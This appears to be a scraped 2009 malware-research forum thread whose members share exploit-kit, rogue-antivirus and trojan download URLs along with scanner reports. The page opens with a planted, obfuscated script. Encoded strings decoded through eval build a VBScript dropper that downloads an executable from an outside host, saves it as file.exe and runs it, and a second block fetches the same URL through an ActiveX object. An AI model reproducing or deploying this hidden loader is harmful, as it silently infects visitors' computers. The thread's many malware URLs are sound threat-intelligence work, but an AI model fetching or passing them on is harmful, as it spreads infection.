K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script><script>
<style>.QIgskwBJjInK_41K{display:none;}</style>
<b class="QIgskwBJjInK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="QIgskwBJjInK_41K" id="QIgskwBJjInK_41K">100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.117.110.101.115.99.97.112.101.40.34.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.118.98.115.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.51.68.51.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.84.121.112.101.66.105.110.97.114.121.37.51.68.49.37.48.68.37.48.65.67.111.110.115.116.37.48.68.37.48.65.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.51.68.50.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.70.83.79.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.83.116.114.101.97.109.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.87.83.104.101.108.108.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.99.66.121.116.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.78.97.109.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.80.114.111.103.37.48.68.37.48.65.79.98.106.78.97.109.101.37.51.68.37.50.50.65.68.79.68.66.37.50.50.37.48.68.37.48.65.79.98.106.80.114.111.103.37.51.68.37.50.50.83.116.114.101.97.109.37.50.50.37.48.68.37.48.65.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.83.101.116.37.50.48.111.83.116.114.101.97.109.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.79.98.106.78.97.109.101.37.50.48.37.50.54.37.50.48.37.50.50.46.37.50.50.37.50.48.37.50.54.37.50.48.79.98.106.80.114.111.103.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.73.102.37.50.48.69.114.114.46.110.117.109.98.101.114.37.50.48.37.51.67.37.51.69.37.50.48.48.37.50.48.84.104.101.110.37.48.68.37.48.65.83.101.116.37.50.48.111.70.83.79.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.83.99.114.105.112.116.105.110.103.46.70.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.108.101.83.121.115.116.101.109.79.98.106.101.99.116.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.83.101.116.37.50.48.80.108.117.103.105.110.70.105.108.101.37.51.68.111.70.83.79.46.67.114.101.97.116.101.84.101.120.116.70.105.108.101.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.37.48.68.37.48.65.84.82.85.69.37.50.57.37.48.68.37.48.65.80.108.117.103.105.110.95.115.105.122.101.37.51.68.76.101.110.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.57.37.48.68.37.48.65.37.48.68.37.48.65.70.111.114.37.50.48.106.37.51.68.49.37.50.48.84.111.37.50.48.80.108.117.103.105.110.95.115.105.122.101.37.48.68.37.48.65.37.50.48.37.50.48.99.66.121.116.101.37.51.68.77.105.100.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.67.106.37.50.67.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.66.121.116.101.67.111.100.101.37.51.68.65.115.99.66.37.50.56.99.66.121.116.101.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.87.114.105.116.101.37.50.56.67.104.114.37.50.56.66.121.116.101.67.111.100.101.37.50.57.37.50.57.37.48.68.37.48.65.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.67.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.83.101.116.37.50.48.111.87.83.104.101.108.108.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.87.83.99.114.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.112.116.46.83.104.101.108.108.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.111.87.83.104.101.108.108.46.82.117.110.37.50.48.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.57.37.50.67.49.37.50.67.70.65.76.83.69.37.48.68.37.48.65.69.108.115.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.77.111.100.101.37.51.68.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.84.121.112.101.37.51.68.97.100.84.121.112.101.66.105.110.97.114.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.79.112.101.110.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.87.114.105.116.101.37.50.48.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.83.97.118.101.84.111.70.105.108.101.37.48.68.37.48.65.37.48.68.37.48.65.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.48.68.37.48.65.37.50.48.119.105.110.100.111.119.46.111.83.104.101.108.108.65.112.112.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.48.68.37.48.65.69.110.100.37.50.48.73.102.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.37.48.68.37.48.65.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.86.66.83.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.111.110.37.50.48.101.114.114.111.114.37.50.48.114.101.115.117.109.101.37.50.48.110.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.108.37.50.48.37.51.68.37.50.48.37.50.50.104.116.116.112.37.51.65.37.50.70.37.50.70.50.51.51.50.52.50.46.99.111.109.37.50.70.49.37.50.70.108.111.97.100.46.112.104.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.100.102.37.50.48.37.51.68.37.50.48.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.37.50.56.37.50.50.111.98.106.101.99.116.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.49.37.51.68.37.50.50.99.108.115.105.100.37.51.65.66.68.57.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.50.37.51.68.37.50.50.67.53.53.54.45.54.53.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.51.37.51.68.37.50.50.51.45.49.49.68.48.45.57.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.52.37.51.68.37.50.50.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.102.117.108.108.37.51.68.99.108.115.49.37.50.54.99.108.115.50.37.50.54.99.108.115.51.37.50.54.99.108.115.52.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.102.46.115.101.116.65.116.116.114.105.98.117.116.101.37.50.48.37.50.50.99.108.97.115.115.105.100.37.50.50.37.50.67.99.108.115.102.117.108.108.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.49.37.51.68.37.50.50.77.105.99.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.50.37.51.68.37.50.50.114.111.115.111.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.51.37.51.68.37.50.50.102.116.46.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.52.37.51.68.37.50.50.88.77.76.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.53.37.51.68.37.50.50.72.84.84.80.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.37.51.68.115.116.114.49.37.50.54.115.116.114.50.37.50.54.115.116.114.51.37.50.54.115.116.114.52.37.50.54.115.116.114.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.120.37.50.48.37.51.68.37.50.48.100.102.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.115.116.114.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.49.37.51.68.37.50.50.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.50.37.51.68.37.50.50.100.111.100.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.51.37.51.68.37.50.50.98.46.83.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.52.37.51.68.37.50.50.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.53.37.51.68.37.50.50.114.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.54.37.51.68.37.50.50.97.109.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.49.37.51.68.97.119.98.49.37.50.54.97.119.98.50.37.50.54.97.119.98.51.37.50.54.97.119.98.52.37.50.54.97.119.98.53.37.50.54.97.119.98.54.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.53.37.51.68.115.116.114.98.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.89.89.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.116.114.98.53.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.116.121.112.101.37.50.48.37.51.68.37.50.48.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.54.37.51.68.37.50.50.71.69.84.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.79.112.101.110.37.50.48.115.116.114.54.37.50.67.37.50.48.100.108.37.50.67.37.50.48.70.97.108.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.83.101.110.100.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.50.102.105.108.101.46.101.120.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.49.37.51.68.37.50.50.83.99.114.105.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.50.37.51.68.37.50.50.116.105.110.103.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.51.37.51.68.37.50.50.46.70.105.108.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.52.37.51.68.37.50.50.101.83.121.115.116.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.53.37.51.68.37.50.50.109.79.98.106.101.99.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.37.51.68.115.99.114.105.112.49.37.50.54.115.99.114.105.112.50.37.50.54.115.99.114.105.112.51.37.50.54.115.99.114.105.112.52.37.50.54.115.99.114.105.112.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.70.70.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.99.114.105.112.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.116.109.112.37.50.48.37.51.68.37.50.48.70.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.37.50.56.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.48.70.70.46.66.117.105.108.100.80.97.116.104.37.50.56.116.109.112.37.50.67.102.110.97.109.101.122.122.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.111.112.101.110.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.119.114.105.116.101.37.50.48.120.46.114.101.115.112.111.110.115.101.66.111.100.121.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.115.97.118.101.116.111.102.105.108.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.99.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.77.77.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.37.50.50.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.77.77.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.37.50.50.37.50.50.37.50.67.37.50.50.37.50.50.37.50.67.37.50.50.111.112.101.110.37.50.50.37.50.67.48.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.34.41.41.59</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("QIgskwBJjInK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script></script>
<style>.M7RtpCTPdGVn6K_41K{display:none;}</style>
<b class="M7RtpCTPdGVn6K_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="M7RtpCTPdGVn6K_41K" id="M7RtpCTPdGVn6K_41K">13.10.100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.111.98.106.101.99.116.32.105.100.61.92.34.75.95.52.49.75.67.56.122.92.34.32.99.108.97.115.115.105.100.61.92.34.99.108.115.105.100.58.123.57.55.65.70.52.65.52.53.45.52.57.66.69.45.52.52.56.53.45.57.70.53.53.45.57.49.65.66.52.48.70.50.56.56.70.50.125.92.34.62.60.47.111.98.106.101.99.116.62.34.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.65.56.122.40.41.13.10.32.123.13.10.32.118.97.114.32.75.95.52.49.75.66.56.122.32.61.32.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.13.10.32.75.95.52.49.75.67.56.122.46.79.112.101.110.87.101.98.70.105.108.101.40.75.95.52.49.75.66.56.122.41.13.10.32.125.13.10.32.75.95.52.49.75.65.56.122.40.41.59.13.10.32</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("M7RtpCTPdGVn6K_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 07:08:36 pm
I believe reports to

newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099

http://wepawet.cs.ucsb.edu/view.php?hash=7e2b3bcf078f597a13b9d4f3cf60283c&t=1238957989&type=js

has changed to mabira.net/z/config.bin at the same host.
newsineurope.net/z/config.bin is not available.
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 08:02:28 pm
Code: [Select]
javacsript.biz/in/in.cgi?2http://wepawet.cs.ucsb.edu/view.php?hash=a85e578048b1a2f6bd32246b5c9ef7b9&t=1238961548&type=js

redirects to exploits at
Code: [Select]
http://netcorbina.org/in90/
netcorbina.org/in90/iepdf.php?f=new
http://www.virustotal.com/analisis/e0798c9484695e356ca872fb150410ca 1/40

trojan
Code: [Select]
http://netcorbina.org/in90/load.phphttp://www.virustotal.com/analisis/f1051127ffaba83b33e3761c455a46c5 2/40
Title: Re: daily something......
Post by: CkreM on April 05, 2009, 09:14:18 pm
rogue:
Code: [Select]
http://tubeloyaln.com/scan/?id=260
http://winpc-antivirus.com/

exploit/trojan:
Code: [Select]
http://sykalab.net/inn/index.phphttp://wepawet.iseclab.org/view.php?hash=c8b425b1ef9fb404ee337d4e72d467b6&t=1238959411&type=js
Title: Re: daily something......
Post by: sowhat-x on April 06, 2009, 11:59:07 am
These two are quite well detected...
Quote
hxxp://put.ghura.pl/81.exe
hxxp://put.ghura.pl/wr.exe

This one isn't very well detected...
Quote
hxxp://nemesis.feed.parkingspa.com/NemesisClient.cab
http://www.virustotal.com/analisis/d8f47e014b7190ba7ec12112ea7c5ba8

And the well-known friends from zief.pl once again...
Quote
hxxp://zief.pl/iraq.jpg/
http://www.virustotal.com/analisis/7e573eac2d13fbc94bf9d81d2702c140
--->
hxxp://jl.chura.pl/rc/pdf.php?id=456346
http://wepawet.iseclab.org/view.php?hash=c5ec3e0138dd5d5b4d9c204654deb18a&t=1239017754&type=js
Zief.pl crap in attachment as well,password is "infected" as always...
Title: Re: daily something......
Post by: SysAdMini on April 06, 2009, 12:06:30 pm
exploit
Code: [Select]
http://www.poshlivse.com/index.phphttp://wepawet.iseclab.org/view.php?hash=92dff88b48386b1b933001ca33b73212&t=1239014786&type=js

trojan
Code: [Select]
http://www.poshlivse.com/load.phpMD5...: 38970d48df49ca67e06a755350ca9029
http://www.virustotal.com/analisis/ef07a0f7e3e2b1413a9fd591ceede630 2/40
eSafe    7.0.17.0    2009.04.05    Suspicious File
Sophos    4.40.0    2009.04.06    Mal/EncPk-HJ

A compromised site which contains an Iframe to this site is
Code: [Select]
limitin.dehttp://wepawet.iseclab.org/view.php?hash=cd2389a3c5064493afe100c17c953d11&t=1239015252&type=js

trojan Koobface
Code: [Select]
79.119.2.227/pid=1000/setup.exe
98.200.26.126/pid=1000/setup.exe
Title: Re: daily something......
Post by: sowhat-x on April 06, 2009, 12:51:34 pm
Another Koobface...
Quote
hxxp://96.35.12.230
hxxp://96.35.12.230/player.swf?pid=6123
hxxp://96.35.12.230/setup.exe

What's kinda interesting actually is the .swf itself...
http://www.virustotal.com/analisis/428b28603b7ef35dfa4b35d85ae65fcc
And after being decompressed also...
http://wepawet.iseclab.org/view.php?hash=c17f6d015c0bc212850fc20e9133e700&type=swf
http://www.virustotal.com/analisis/388afb42ca35d977a980b631b6f7419b
Can't really say it's not to be considered at least as a malware component...  :-\

Quote
hxxp://61.235.117.70/update.exe
http://www.virustotal.com/analisis/b6d794becce8fad6b6a20a581998dbe1

"It works!" -> is that so?  :D
Quote
hxxp://usacaaugb.cn/life/iepdf.php?f=new
hxxp://usacaaugb.cn/life/iepdf.php?f=old
hxxp://usacaaugb.cn/life/load.php

Quote
hxxp://www.ohtas.biz/stproj/flash.php
Result: 11/40 (27.5%)
http://www.virustotal.com/analisis/809a0e88b7935b661a46fab342169c8a

Quote
hxxp://www.vivne.cn/vn.exe
http://www.virustotal.com/analisis/e3ae284eb9482b92f5cd7f09781c451a
http://anubis.iseclab.org/?action=result&task_id=1f8ac8cc0933668946de525e26eae0872&format=html
Title: Re: daily something......
Post by: SysAdMini on April 06, 2009, 05:53:13 pm
pdf exploit/trojan
Code: [Select]
famajormusic.ru/jjkj/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=5bb19ee926f1557416d2ee2131adf36e&t=1239040477&type=js
http://www.virustotal.com/analisis/c6087121de76e697622bb78ded6e8e8d 6/40
Title: Re: daily something......
Post by: CkreM on April 06, 2009, 06:10:08 pm
Rogue:
Code: [Select]
Soldiersoftware.net
Redirect to exploit:
Code: [Select]
fikalo.dehttp://wepawet.iseclab.org/view.php?hash=a3d3398c25bdc7262e98bd19cdee44c1&t=1239025317&type=js
Title: Re: daily something......
Post by: sparsha on April 07, 2009, 07:32:52 am
Code: [Select]
Fake scanners:

http://sys-scan-wiz.org/download.php?page=http://sys-scan-wiz.org/
scanner-wiz-1.com
Avs-online-scan.org
av-lookup.org
Free-web-scaners.net/disk/?code=286
http://am-scan.com/l3/index.html?ref_id=7091
http://am-scan.com/download.php?page=http://am-scan.com/l3/index.html?ref_id=7091

Rogue installers:

http://222.186.9.187/setup.exe
http://www.spy-protector-pro.com/install.exe
http://chorussoft.biz/install.exe

http://webwidesecurity.com/index.php?affid=09400
http://webwidesecurity.com/download.php?affid=00000

fastpayprocess.com -> Pandora Software

Fake codecs:
xviewworldmy2.com/view/1/1220/3
Title: Re: daily something......
Post by: SysAdMini on April 07, 2009, 07:59:44 am
exploits/Zbot
Code: [Select]
jeans0nline.cn/win/index.php?iuBgwPahttp://wepawet.iseclab.org/view.php?hash=2c245804906db1beb7aa12d7d6c18abd&t=1239091219&type=js
http://www.virustotal.com/analisis/fbc3fe9d822e4e95f6118663a438d051 5/40

It is a new Zbot variant which uses new file names.

http://www.threatexpert.com/report.aspx?md5=557c2e0a44e5fa46668383209dc7d65a
Title: Re: daily something......
Post by: sparsha on April 07, 2009, 09:23:25 am
Few more

Code: [Select]
http://antiviral-scan-pro.com/11041/3/
http://files.load-pro-antispy.com/normal/setup_11041_3_1.exe

http://goforuniq.com/in.cgi?13&gai=csptop&gli=400&gff=cs_3578123074&al=

http://bonuspromooffer.com/vsm/adv/142/?a=csptop-sst&l=400&f=cs_3578123074&ex=&ed=&h=&sub=csp&prodabbr=3P_UVSM
http://dwnld.bonuspromooffer.com/secure/4f6c9cf2c210fefe73170ddfe8880e38/49db0f09/vsm/vsm_free_setup.exe
http://dwnld.promotion-offer.com/secure/2b686c9bbf54a2803cc230f1a3e6eb1d/49db1161/srm/srm_free_setup.exe

http://www.xp-shield.cn/download.html


Title: Re: daily something......
Post by: sparsha on April 07, 2009, 09:35:19 am
couple more links
Code: [Select]
best-av1.info
http://download.best-av1.info/en/PE/install.exe


Other files usually used by this rogue family [browser hijacker, Fake BSOD..]
Code: [Select]
http://download.best-av1.info/en/PE/N1.CAB
http://download.best-av1.info/en/PE/QWProtect.dll
http://download.best-av1.info/en/PE/svchost.exe

Title: Re: daily something......
Post by: SysAdMini on April 07, 2009, 03:36:52 pm
pdf/flash exploit
Code: [Select]
truff.biz/myy/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=485a23bf02f4721e4170bffe1dfc0903&t=1239118663&type=js

trojan
Code: [Select]
http://truff.biz/myy/load.php?id=4http://www.virustotal.com/analisis/78ca3e1b17cf6b3499d9714cf2cdda15
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 04:22:48 pm
seems like Zeus in the end:
Code: [Select]
http://update3.cn/spl111/index.phphttp://wepawet.iseclab.org/view.php?hash=13b9fbbd568f6bbba6bfb2088e20610d&t=1239121445&type=js
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 07:14:39 pm
pdf exploit leading to zeus infection:
Code: [Select]
http://233242.info/1/include/spl.php
http://233242.info/1/load.php
http://www.virustotal.com/analisis/d6fcdb78ed428bf52f47e6fb75bed6fc
http://wepawet.iseclab.org/view.php?hash=b03cbc6d02dc98d6b9527060c8a7ebe9&t=1239125074&type=js

now this exploit isn't working good for me(if anyone else could check it ,would be nice)
should start here but gave me some kind of error:
Code: [Select]
http://sh-hostz9.net/1/index.phphttp://wepawet.iseclab.org/view.php?hash=20c7f173f3a113538dea1ba392d13305&t=1239121977&type=js

Iframes to :
Code: [Select]
http://sh-hostz9.net/1/pdf.phphttp://wepawet.iseclab.org/view.php?hash=3c236eaec1299ed3c633aed33ae1736e&t=1239122033&type=js
and
Code: [Select]
http://sh-hostz9.net/1/vparivatel.php  (from here it gives you a screen to do some update)
http://wepawet.iseclab.org/view.php?hash=9a310342e3d2202d661d75be9333b869&t=1239131443&type=js
finally leads to the trojan:
Code: [Select]
http://sh-hostz9.net/1/load.php

Hamm now its starting from :
Code: [Select]
http://sh-hostz9.net/2/index.phphttp://wepawet.iseclab.org/view.php?hash=f883649411359a991e9f55e2cc541cc8&t=1239132145&type=js

leading also to:
Code: [Select]
http://sh-hostz9.net/2/pdf.php
lol changed after 30 min or so ~.~
Title: Re: daily something......
Post by: sowhat-x on April 07, 2009, 07:41:32 pm
Quote
now this exploit isn't working good for me(if anyone else could check it ,would be nice)
Both of them are in the same ip address,220.196.59.26,meaning there's a good chance that if you first visited one of them first...
And the rest of the domains hosted there aren't much different,heh...but i didn't manually verified them,merely googled about them.

Earlier ips in the same netblock there host malicious domains from what i see...
will attempt digging them tomorrow though,need some sleep now ;-)
Quote
hxxp://goshak.biz/my/index.php
Title: Re: daily something......
Post by: CkreM on April 07, 2009, 07:48:48 pm
Quote
now this exploit isn't working good for me(if anyone else could check it ,would be nice)
Both of them are in the same ip address,220.196.59.26,meaning there's a good chance that if you first visited one of them first...
And the rest of the domains hosted there aren't much different,heh...but i didn't manually verified them,merely googled about them.

Earlier ips in the same netblock there host malicious domains from what i see...
